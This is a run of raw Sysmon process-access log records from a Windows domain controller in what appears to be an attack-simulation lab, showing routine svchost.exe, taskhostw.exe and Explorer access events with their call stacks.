13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.123{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.107{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.092{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.092{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.060{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.060{08A6967A-4754-6000-1A05-000000009A01}28844184C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.045{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\